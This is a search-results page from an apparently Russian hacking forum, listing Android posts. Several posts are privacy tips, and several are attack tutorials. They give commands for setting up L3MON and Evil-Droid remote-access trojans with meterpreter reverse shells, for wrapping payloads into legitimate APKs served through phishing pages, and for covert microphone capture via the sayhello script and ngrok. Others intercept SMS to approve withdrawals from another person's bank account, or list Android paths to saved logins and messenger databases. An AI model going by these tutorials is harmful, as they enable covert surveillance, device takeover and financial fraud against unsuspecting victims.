Jump to content
Новости и объявления.
  • Уважаемые гости. При посещении нашего сайта, просим вас ознакомиться с разделами форума, прежде чем оставлять ваши объявления и т.д. Рекомендуем посетить разделы: "Общение, Коммерческий раздел, Услуги Хакеров и статьи, Отзывы о сайте и пользователях, Черный список" и другие разделы нашего сайта. ***ВНИМАНИЕ*** При обращении за помощью, просим быть внимательными, на сайте есть, как проверенные специалисты, так и непроверенные. Если вы обратились к специалисту, который проверку НЕ проходил, рекомендуем воспользоваться услугой гарант сервиса. xakervip.com
  • Взлом
  • Взлом
  • Гарант-сервис
  • Реклама на форуме

Search the Community

Showing results for tags 'взлом андроид'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Admin
    • Hacker Forum news.
    • Transactions are the guarantor of the service.
    • A section for resolving controversial issues.
  • Общение.
    • A section for resolving controversial issues.
    • A section for resolving controversial issues.
  • Коммерческий раздел.
    • A trading platform on a hacker site.
    • Services related to communication, telephony, number substitution, etc.
    • Promotion, promotion, SEO, etc.
    • Sale-Purchase Of Cryptocurrencies.
  • Практика взлома, информация и т.д
    • Web vulnerability.
    • Social network
    • E-Mail (Mail).
    • Malware.
    • Soft Hacker
    • Freebie (I'll give it away for free).
    • Help with various software problems and computer problems.
  • Безопасность.
    • Help with malware infection.
    • Punishment for hacking.
    • Secure connection with IP address substitution and security articles.
  • XAKER (Hacker Services and articles).
    • Services of professional hackers (HACKING SERVICES)
    • Hacking services (REFUSED VERIFICATION).
    • About professional hackers (ARTICLES AND STORIES).
    • Requests for help.
  • Other topics, miscellaneous.
    • Reviews of hackers/programmers who helped you.
    • Reviews about our site and suggestions to change your opinion.
    • Reviews of third-party resources.
  • Реклама на форуме.
    • Advertising on the forum.
  • Черный список. (BLACK LIST).
    • BLACKLIST. Scammers and would-be hackers.
    • What methods scammers use to deceive users (Articles).
  • Разное.
    • Other topics, miscellaneous.
    • Other topics, miscellaneous.

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Сайт


ICQ


Yahoo


Skype


Город


Интересы

Found 15 results

  1. Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как вы можете защититься от прослушки на Android. Февраль 2022-го — роковой месяц в новейшей истории. И июнь 2013-го — тоже примерно из такой же категории. Но все ли помнят, что тогда произошло? Тогда мир узнал, кто такой Эдвард Сноуден. Американский технический специалист стал героем — когда опубликовал секретные документы Агентства национальной безопасности США. Они стали прямым доказательством тотальной слежки — за всем и за всеми! С тех пор микрофоны на своих устройствах заклеивает не только глава ФБР Джеймс Коми, но и миллионы простых пользователей. Правда, уродливая липкая лента — это как-то топорно. А вот Micro Guard Blocker — совсем другое дело! Пара кликов, и смартфон полностью защищён от таких приложений как Spyware и Surveillance. «Да пускай верхи слушают, пусть хоть заслушаются!» — подумаешь ты. Ну, во-первых, это рабское мышление. А во-вторых, хакеры. Поверь, они найдут способ наживиться даже на такой, казалось бы, не особо чувствительной инфе как запись с микрофона. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  2. Приветствую, хакеры! В данной небольшой статье, я хочу рассказать вам о том, как установить Kali Linux на Android без рут прав. Kalimux — скрипт на основе bash, который автоматически устанавливает kali linux в termux без каких-либо проблем и без рута. Этот инструмент работает как на устройстве Android с root-правами, так и на устройстве Android без root-доступа. Установка: $ apt-get update -y $ apt-get upgrade -y $ pkg install python -y $ pkg install python2 -y $ pkg install git -y $ pip install lolcat $ git clone https://github.com/noob-hackers/kalimux $ cd $HOME $ ls $ cd kalimux $ ls $ sh kalimux.sh Запуск: $ ./start-kali.sh Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  3. Приветствую, хакеры! В данной статье собраны несколько секретных Android-папок, которые могут вам пригодиться. Контакты пользователя: /data/data/com.android.providers.contacts/databases/contacts2.db Данные смс сообщений: /data/data/com.android.providers.telephony/databases/mmssms.db История звонков: /data/data/com.android.providers.contacts/contacts.db Журнал событий Android: /data/com.sec.android.provider.logsprovider/databases/logs.db История веб браузера: /data/data/com.android.browser/databases/browser2.db Истории браузера Chrome: /data/data/com.android.chrome/app_chrome/Default/Archived History /data/data/com.android.chrome/app_chrome/Default/History Логины и пароли водимые в браузере Chrome: /data/data/com.android.chrome/app_chrome/Default/Login Data Браузер Firefox. /data/data/org.mozilla.firefox/files/mozilla Сообщения Facebook: /data/data/com.facebook.katana/databases/threads_db2 /data/data/com.facebook.orca/databases/threads_db2 Контакты WhatsApp: /data/data/com.whatsapp/databases/wa.db Звонки WhatsApp: /data/data/com.whatsapp/databases/msgstore.db Сообщения WhatsApp: /data/data/com.whatsapp/databases/msgstore.db Сообщения и звонки для Skype: /data/data/com.skype.raider/files//main.db Viber хранит отдельно сообщения и звонки: /data/data/com.viber.voip/databases/viber_data Сообщения Viber: /data/data/com.viber.voip/databases/viber_messages Telegram: /data/data/org.telegram.messenger/files/cache4.db Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  4. Приветствую, хакеры! В данной небольшой статье я хочу рассказать о том, как моментально удалить все данные с телефона. Иногда данные на телефоне, — фотографии, номера, приложения, — нужно удалить быстро. Ситуации бывают разные: выбивают дверь сотрудники СОБР, принял решение покончить жизнь самоубийством, предлагают 1.000.000$ в обмен на смартфон и дают минуту на принятие решения. Но обычно все куда прозаичнее: телефон вот-вот перейдёт новому владельцу. И ему явно ни к чему знать все подробности твоей личной жизни... чтобы не было, как в фильме «Текст». Extirpater — Android-приложение, которое быстро стирает все данные с телефона. Без возможности восстановления! Механика необычная: сначала свободное на смартфоне место заполняется случайными файлами, а затем вся «коллекция» одним махом отправляется в бездонную корзину. Bye-bye! «А зачем вся эта суета? Есть ведь сброс до заводских настроек!» — скажешь ты. Есть! Вот только на полную гарантию удаления ВСЕХ данных при таком раскладе рассчитывать не приходится. В частности речь о фотографиях. Проверено! Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  5. Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как открывать приложения в Android без их установки. Как говорил Эрлих Бахман их сериала Кремниевая Долина: "Мобильные приложения никогда не удаляют". И это так и есть, готов поспорить, что на вашем устройстве есть как минимум два приложения, которыми вы абсолютно не пользуетесь, но и удалять не спешите. С целью экономии места, можно использовать интересную фичу от PlayMarket — приложения с мгновенным запуском. Суть в том, что некоторые приложения в сторе можно запускать предварительно не устанавливая их. Для начала эту функцию необходимо активировать. Для начала открываем настройки и переходим в раздел "Google". Далее выбираем пункт "Приложения с мгновенным запуском" и активируем его. В итоге на страницах некоторых приложений в PlayMarket помимо кнопки "Установить" появится также кнопка "Попробовать". После клика по ней, мгновенно, без установки откроется выбранное приложение. Единственный минус, некоторые функции в нем могут быть недоступны. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации. Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как открывать приложения в Android без их установки. Как говорил Эрлих Бахман их сериала Кремниевая Долина: "Мобильные приложения никогда не удаляют". И это так и есть, готов поспорить, что на вашем устройстве есть как минимум два приложения, которыми вы абсолютно не пользуетесь, но и удалять не спешите. С целью экономии места, можно использовать интересную фичу от PlayMarket — приложения с мгновенным запуском. Суть в том, что некоторые приложения в сторе можно запускать предварительно не устанавливая их. Для начала эту функцию необходимо активировать. Для начала открываем настройки и переходим в раздел "Google". Далее выбираем пункт "Приложения с мгновенным запуском" и активируем его. В итоге на страницах некоторых приложений в PlayMarket помимо кнопки "Установить" появится также кнопка "Попробовать". После клика по ней, мгновенно, без установки откроется выбранное приложение. Единственный минус, некоторые функции в нем могут быть недоступны. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  6. Приветствую, хакеры! В данной небольшой статье хочу предоставить вам небольшую подборку безопасных браузеров для смартфонов Android и iOS. Android: 1. Bromite — это браузер на базе Chromium с улучшенной настройкой конфиденциальности и безопасности. Встроенный блокировщик рекламы, поддержка DNS-over-HTTPS, Canvas и другие фичи. 2. Fennec F-Droid — форк браузера Mozilla Firefox для Android, заточенный на приватность. 3. Privacy Browser — еще одна альтернатива с открытым исходным кодом. GPLv3+ лицензия. iOS: 1. Onion Browser — браузер с открытым исходным кодом, позволяющий заходить в сеть Tor c устройств на iOS. 2. SnowHaze — неплохой браузер с открытым исходным кодом и встроенными анти-трекерами, блокировкой отпечатка браузера и не только. Для обеих ОС: DuckDuckGo Privacy Browser, полагаю, что в представлении не нуждается. (Android | iOS) Это отличные варианты, чтобы улучшить свою безопасность при использовании смартфонов. Обыкновенные браузеры не способны давать такой уровень защиты, как эти решения, поэтому рекомендую пользоваться именно ими. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  7. Приветствую, хакеры! В данной небольшой статье я хочу с вами поделиться облачным пакетом удалённого управления Android под названием L3MON. L3MON - это облачный пакет для удалённого управления Android. Установка: $ apt install nodejs npm $ npm install pm2 -g $ git clone https://github.com/D3VL/L3MON.git Использование: $ cd L3MON $ cd server $ npm install $ npm audit fix $ pm2 start index.js $ pm2 startup Теперь вам нужно изменить пароль на шифрование хэша MD5 и поместить его в файл конфигурации для защиты панели администратора. Вы можете изменить пароль в соответствии с приведенной ниже командой. $ echo -n "12345" | md5sum $ nano maindb.json Запустите localhost на браузере и введите имя пользователя «admin» и пароль «12345». Создайте APK вирус и отправьте её жертве. После того жертва запустить ваш вирус, у вас на localhost появится его устройство со всеми функциями доступа. Отличный метод взлома смартфона на Android. У этого способа есть огромный потенциал, а самое главное, что вам не потребуется огромного количества навыков, чтобы начать изучать подобный взлом. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  8. Приветствую, хакеры! Данная статья создана для тех, кто не хочет терять ни секунды: с помощью режима "Мгновенный запуск" вы можете запустить приложение из PlayMarket без установки. 1. Заходим в "Настройки" смартфона, листаем до раздела "Google" и открываем его; 2. Выбираем подраздел "Настройки для приложений Google"; 3. Переходим в пункт "Google Play Instant" или "С мгновенным запуском" и нажимаем на переключатель напротив "Обновить веб-ссылки"; 4. Открываем Play Market и находим приложение с поддержкой быстрого запуска, например, Vimeo. При переходе на страницу приложения видим кнопку "Попробовать" — нажимаем на неё, готово; 5. Поздравляю, вы великолепны! Однако не все приложения поддерживают технологию "Instant App", поэтому некоторые приложения всё-таки придётся скачивать. Очень полезная функция, которая позволит вам легко и очень быстро просматривать всю необходимую информацию из приложения. Поэтому если вы спешите или не хотите лишний раз засорять телефон, то данная функция вам очень понадобится. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  9. Приветствую, хакеры! Технология Signalling System No.7 (SS7), которой уже около 40 лет, имеет критическую уязвимость. Благодаря этому мы можем получать доступ к аккаунтам соцсетей, онлайн-банкингу и прослушивать мобильные звонки, имея в распоряжении только номер телефона жертвы. Нам понадобится: Совместимый телефон на базе чипсета Calypso или MediaTekПрошивка OsmocomBBКабель и преобразователь USB-TTLКомпьютер под управлением Unix-like ОСИтак, мы имеем настроенную ОС со стеком OsmocomBB Запускаем стек программ osmocombb. Тут все просто. Предварительно подключаем наш кабель к компьютеру и пробрасываем его внутрь виртуалки. В виртуальной машине должно появиться устройство /dev/ttyUSB0. Далее подключаем ВЫКЛЮЧЕННЫЙ телефон к кабелю через аудиоджек. Открываем две консоли. В первой запускаем команду: #~/osmocom-bb-master/src/host/osmocon/osmocon -p /dev/ttyUSB0 -m c123xor -c ~/osmocom-bb-master/src/target/firmware/board/compal_e88/layer1.highram.bin И нажимаем красную кнопку включения телефона. Этой командой мы запускаем загрузку прошивки в телефон, а также открытие сокета, через который будет идти общение наших программ с телефоном. Это так называемый layer 1 модели OSI. Реализует физическое взаимодействие с сетью. Во второй консоли запускаем команду: #~/osmocom-bb-sylvain/src/host/layer23/src/misc/ccch_scan -a 774 -i 127.0.0.1 Эта команда реализует layer 2-3 модели OSI. А именно прослушивание эфира в поисках пакетов общего управления СССH (Common Control Channel). -a 774 — обозначает ARFCN, на котором мы вещаем. -i 127.0.0.1 — интерфейс, на который мы отправим наши пакеты. И запускаем Wireshark. Он все сделает за нас, а именно соберет необходимые пакеты в SMS, распарсит TPDU/PDU-формат и покажет нам все в удобочитаемом виде. Давайте перехватим, например, SMS для того что бы подтвердить вывод средств из чужого счет Сбербанка онлайн. Для удобства просмотра в Wireshark ставим фильтр на gsm_sms-пакеты, чтобы не засорять экран. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  10. Спамерские сообщения чаще всего снабжены пикселями отслеживания, которые позволяют отправителю отслеживать вашу онлайн-активность. В частности, в письмах такой HTML-фрагмент кода следит, открыли ли вы сообщение, когда и где это сделали. Такая слежка приятна не всем, но есть способ ее остановить. Чаще всего пиксель отслеживания встраивается в код изображения или ссылку: вы открываете письмо и информация о вас поступает обратно на сервер компании. Крупные компании уже предпринимают попытки ограничить объем данных, передаваемых таким образом. Например, с 2014 года все изображения в Gmail обрабатываются через собственный прокси-сервер Google, который помогает скрыть ваше местоположение хотя бы от некоторых приложений. В браузерной версии Microsoft Outlook тоже можно включить в настройках обработку изображений собственными службами компании. Но что можно предпринять самостоятельно, чтобы за вами не следили через письма? В первую очередь, нужно запретить вашей электронной почте автоматически загружать изображения, поскольку именно в них скрывается большинство пикселей отслеживания. Всех трекеров так избежать невозможно, но большинства из них — вполне. К слову, это заодно поможет сэкономить мобильный трафик. Чтобы отключить автозагрузку изображений в почтовом сервисе, нужно в настройках остановить показ изображений. Например: для Gmail в браузере нужно нажать значок шестеренки в правом верхнем углу, выбрать «Все настройки» и прокрутить до раздела «Изображения», где выбрать «Спрашивать, нужно ли показать изображения»; Отключение загрузки изображений в Gmail в Microsoft Outlook для Windows 10 можно установить флажки, запрещающие автоматическую загрузку изображений, в разделе «Файл»>«Параметры»> «Параметры Outlook» >«Центр управления безопасностью»> «Настройки центра управления безопасностью»; в Microsoft Outlook для Mac предлагается установить автозагрузку изображений от доверенных контактов или вообще ее выключить («Файл»> «Настройки»> «Чтение»); в мобильной версии почты для Android и iOS нужно тапнуть на настройки, прокрутить до раздела «Почта», выбрать нужную учетную запись и запретить загружать изображения (переключить ползунок). Отключение загрузки изображений в iOS Также можно использовать почтовый клиент наподобие Thunderbird, который по умолчанию блокирует удаленные изображения и позволяет загружать картинки только от доверенных контактов. Кроме того, напомним, что не стоит переходить по ссылкам, полученным от посторонних. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  11. Приветствую, хакеры! Чтобы увеличить привлекательность смартфонов, производители ставят на них как можно больше разных программ. Это понятно. Просто берём и удаляем ненужное… Стоп. Оказывается, некоторые программы невозможно удалить. Например, на отдельных моделях Samsung невозможно удалить Facebook (есть только опция 'disable'). Говорят, на Samsung S9 вдобавок предустановлены «неудаляемые» приложения Microsoft. Очень редко встречаются примеры моделей, на которых нет лишних программ. Например, когда вышел первый iPhone, то компания Apple жёстко зафиксировала пакет установленных приложений, поэтому оператор AT&T не смог добавить туда свой привычный мусор. В принципе, по такой логике и многочисленные приложения от Apple на iPhone можно считать ненужным мусором. Если быть точным, на iPhone предустановлены 42 приложения, не все из которых легко удалить. На Android же предустановлено 29 приложений, и тоже некоторые из них не удаляются стандартными средствами
  12. Я уверен, что у каждого из вас есть как минимум один старый Аднроид-телефон. И если вы не знаете куда его деть, у меня для вас есть интересное предложение — сделать из него скрытый диктофон и скрытую камеру наблюдения с детектором движения и возможностью записи происходящего. Приложение, которое делает камеру видеонаблюдения из телефона называется Haven, и разница между ним и другими похожими заключается вот в чем: Рекомендовано самим гуру анонимности и приватности Эдвардом Сноуденом, проектом Guardian и Freedom of the Press Foundation.Не хранит записанную информацию на серверах принадлежащих непонятно кому.Имеет открытый код и доступен для скачивания, который я предполагаю скоро подвергнут аудиту.Установка Haven Перейдите на сайт Google Play, скачайте приложение и запустите.После запуска вас попросят установить пороговые значения для звука и движения, и вам нужно провести некоторое тестирование, чтобы уменьшить ложные срабатывания. При правильной настройке вы исключите постоянные шумы и движения, такие как звук работающего холодильника или появление вашего кота. Также приложение Haven предложит связать ваше устройство путем добавления номера на который будете получать уведомления. Вы не обязаны это делать, но в таком случае все будет сохраняться только локально в память устройства. Haven использует сквозное шифрование для защиты данных. Пользователи, которые хотят еще больше безопасности, могут использовать для этого сеть Tor. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  13. Сегодня поговорим о том, как имея в распоряжении один лишь компьютер с операционной системой Linux или смартфон с Termux’ом на борту, можно сделать полноценное прослушивающее устройство введя в консоли пару-тройку нехитрых команд. Внимание! Замечу, что эта статья написана только для образовательных целей. Мы никого ни к чему не призываем, только в целях ознакомления! Автор не несёт ответственности за ваши действия! Погнали! Инструкция Копируем с гитхаба скрипт sayhello: git clone https://github.com/Aaryan101/sayhello Переходим в соответствующий каталог: cd sayhello Выдаем разрешения: chmod +x sayhello.sh И запускаем скрипт для прослушки: bash sayhello.sh В появившемся окне указываем сервис для форварда (Ngrok 2), а затем выбираем куда будет вести редирект. По дефолту он отправляет жертву прямиком на ютубчик. Копируем сгенерированную ссылку. Далее включаем соображалку, думая под каким благовидным предлогом можно передать её жертве. В конце статьи я подкину вам идею. Если клиент на том конце разрешит доступ То в окне скрипта сразу забегают строки, оповещающие о сохранении файлов аудиозаписей. Прослушать их можно перейдя в каталог sayhello. Записи будут сохраняться до тех пор, пока вы не завершите работу скрипта нажав CTRL+C, либо не ребутните тачку. Жёсткий диск при этом забивается со скоростью света. Основная сложность этого метода заключается в том, как заставить жертву перейти по ссылке, да ещё и разрешить доступ к своему микрофону. Обычно хакеры используют для этого различные площадки с обучающими вебинарами. Т.е. падает вам на почту письмо, мол так и так мы такая-то академия или учебный центр, пройдите по ссылке для доступа к вебинару или онлайн-конференции. Естественно, при таком раскладе в голове обывателя не возникает сомнений в момент подтверждения доступа. Ведь в вебинаре нужно же как-то участвовать. Причём само мероприятие может быть вполне реальным. Вас редиректнут, вы зарегаетесь на фейковом сайте и всё вроде бы ОК. Однако в этот момент вы уже плотно попались на удочку и все ваши разговоры передаются прямиком хакеру. Поэтому будьте предельно бдительны, прежде чем переходить по каким-либо ссылкам. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  14. Привет, хакеры, в этой статье поговорим о взломе андроид смартфонов. Сегодня многие думают о том, чтобы взломать смартфон, удалённо прослушивать разговоры, просматривать смс-ки и самое интересное – смотреть через вебку. Взлом игр, приложений на андроид был доступен уже очень давно, чуть ли не с первых версий. Точнее сказать, тогда это было возможно, но не так популярно. Начнём с того, что андроид является ОС на базе ядра Linux, а это много чего означает. Все возможности, которые у вас есть на десктопной версии, есть и на андроид смартфонах. Тут дело в удобстве. Мы уже публиковали статью, где рассказали о самых популярных приложениях для взлома и тестирования безопасности на андроид. Взлом андроид смартфона не сложнее чем взлом операционной системы, будь-то Linux или Windows. Всегда можно загрузить вредоносное приложение, через которое мы откроем бэкдор и сможем войти в систему удалённо. Есть также возможность прослушивать телефон через открытые порты. Таким вариантом мы сегодня и воспользуемся. Давайте разберемся, что нам для этого понадобится: Скрипт Evil-Droid; Открытый порт; ПК с установленным Kali Linux или загрузочная флешка. Взлом андроид смартфонов – установка и запуск компонентов Скачиваем архив или копируем его через терминал в необходимое место. git clone https://github.com/M4sc3r4n0/Evil-Droid.git Далее переходим в папку и даём права на исполнение файлу evil-droid chmod +x evil-droid Запускаем скрипт и генерируем вредоносный apk с бэкдором sh evil-droid Генерировать можно как файл под номером 2, так и 3. Я пользуюсь третьим, версия подойдёт для андроид устройств с более хорошей безопасностью. Для смартфонов с версией андроид 3-5 подойдёт и 2 пункт. Перед нами появилось меню для настройки apk, которым мы будем пользоваться для взлома андроид. Пункты, которые нам нужно настроить: ip-адрес – на выбор локальный и глобальный, используйте глобальный, если атакуемый смартфон будет не у вас в локальной сети. set lport – установка порта, тут вы можете выбрать любой, главное чтобы он был открыт. Иначе прослушать смартфон не получится. Как просканировать порты в вашей сети – читать. Метод прослушки – я рекомендую использовать android/meterpreter/reverse_tcp, так как мы будем использовать metasploit для управления. Выбор папки, куда будет сгенерирован вредоносный apk. Генерация вредоносного apk. Всё сделано. Для того чтобы произошел взлом андроид смартфона и вы могли им управлять, необходимо установить evilapk на атакуемый смартфон. Тут методов много и придётся использовать СИ. Далее мы запускаем скрипт ещё раз и выбираем пункт – start listening. Зараженный смартфон появиться в списке, и в открытом окне появится возможность ввести команды управления. Для того, чтобы получить их список, воспользуйтесь параметром –help или -h(идентичны). Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  15. Всем привет, сейчас расскажу вам о том, как с помощью apk-файла мы сможем получить доступ к устройству. Первым делом вам нужно скачать любой APK-файл, главное чтобы он весел менее 5 мегабайт, поэтому идем на такой сайт как 4PDA и находим какую-нибудь программу, лично я возьму программу, которая позволят скачивать музыку из соц. сетей. После выполнения данного пункта нам нужно перейти в терминал и прописать все это: -x – использование определенного файла -p – прикрепить payload -o – как-то назвать файл -e – зашифрока файла от антивируса -I – указания кол-ва слоев шифрования Нажимаем Ентер и ожидаем, либо у нас появится ошибка, либо файл будет скомпилирован. Если все-таки появилась ошибка, то нам необходимо обновить APKtool. Если и это не смогло вам помочь, то ищем другой apk-файл, который будете использовать для заражения. Теперь нам нужно использовать фишинг и навыки социальной инженерии для того, чтобы создать простую страницу для зараженной программы. Для создания страницы можно использовать различные конфигураторы сайтов, либо делать это по какому-то исходнику, его я прикрепляю. Не забывайте, что если будете использовать какой-либо конфигуратор, он добавит вам кучу не нужного мусора и хлама. Исходник - https://bit.ly/2k3hKP2 Пароль – social_engineering Помещаем зараженный APK-файл в папку Social, по адресу /var/www/html/ Если картинка не отображается, то вам нужно дать доступ юзеру для чтения и записи в www. Теперь нам необходимо открыть index.html с помощью любого редактора текста и поменять все необходимые вам надписи. После запуска нам нужно открыть бразуер и ввести там свой IP-адрес. Что ваш айпишник стал выглядеть как ссылка для сайта, вам нужно будет установить кое-какую программу, ее найти можно на GitHub, называется она – Cuteit Все расписывать я не буду, в программе есть руководство, которого будет достаточно для нашей задачи. Берем понравившуюся ссылку, копирую ее и вставляем в браузер. Вуаля, мы попали на собственный сервер. Однако в строке сразу же палится ваш IP-адрес, его мы уберем с помощью Ngrok. Скачиваем его, после чего проходим регистрацию и выполняем все действия из руководства, главное быть точным, иначе ничего не сработает. Когда вы закончить все это дело, нам нужно перейти в папку с этой программой, открыть терминал и вписать: Вот мы и получили ссылки, на этом все.
×
×
  • Create New...

Important Information

Guidelines
Terms of Use
We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.